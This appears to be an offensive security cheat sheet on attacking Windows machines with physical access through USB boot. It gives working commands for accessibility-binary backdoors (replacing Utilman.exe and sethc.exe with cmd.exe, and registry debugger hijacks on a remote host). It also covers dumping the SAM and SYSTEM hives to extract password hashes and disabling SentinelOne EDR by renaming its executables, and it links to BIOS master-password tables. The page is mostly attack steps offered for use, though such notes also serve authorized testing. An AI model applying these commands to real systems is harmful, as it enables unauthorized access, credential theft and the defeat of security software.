USB Boot

tip

USB ports must be enabled in the BIOS. If it is not the case, check if the BIOS password protected and change the setting.

BIOS - Master password

• https://bios-pw.org/
• https://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html

Hibernation issues

From Windows

shutdown /s /t 0

From Kali

ntfs-3g -o remove_hiberfile </dev/sdX> </path/to/mount>

Admin CLI

From Kali

copy C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.exe.old
copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
WIN+U

copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.old
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
Hit SHIFT 5 times

From an open logon session

reg add "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
reg add "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
reg delete "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg delete "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f

SAM dump

cp <...>\Windows\System32\config\SYSTEM /tmp
cp <...>\Windows\System32\config\SAM /tmp
samdump2 /tmp/SYSTEM /tmp/SAM

Kill AV/EDR

tip

Check the antivirus executables list.

SentinelOne

Change extension to .old for the following files in the folder C:\Program Files\SentinelOne\...

• AgentUI.exe

• SentinelAgent.exe

• SentinelCtl.exe

• SentinelServicehost.exe